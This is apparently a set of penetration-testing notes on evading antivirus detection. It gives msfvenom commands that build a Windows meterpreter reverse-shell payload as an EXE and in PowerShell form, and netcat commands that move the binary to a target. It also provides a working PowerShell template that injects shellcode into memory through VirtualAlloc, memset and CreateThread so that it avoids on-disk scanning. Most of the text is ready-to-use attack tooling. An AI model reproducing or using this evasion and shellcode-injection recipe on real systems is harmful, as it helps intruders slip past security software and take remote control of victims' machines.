Antivirus Evasion

Detection Methods

Step 1: Generate portable execution file (PE)

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > binary.exe 

Step 2: Run it through a virus scan website such as below

  • Be mindful when submitting executables online since as soon as you submit, it becomes public.

Step 3: Transfer the file to Windows for more analysis

#on Windows 
nc.exe -nvlp 4455 > C:\Windows\Temp\binary.exe 
#from kali
nc -w 3 IP 4455 < binary.exe

On disk evasion

  1. Packers

  2. Obfuscators

  3. Crypters

  4. Software Protectors

In Memory Injection (PE injection)

  • volatile memory

Powershell method (in-memory injection)

  • it's harder for the system to know since it's going to be run inside the interpreter and the script isn't executable code.

  • Below is the template. Create a malicious payload with msfvenom and put the payload inside the sc variable.

$code = '
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = 
  Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

using the VirtualAlloc, it inputs each byte of the payload to the newly allocated memory block.

The last line executes the payload with CreateThread.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f powershell

Last updated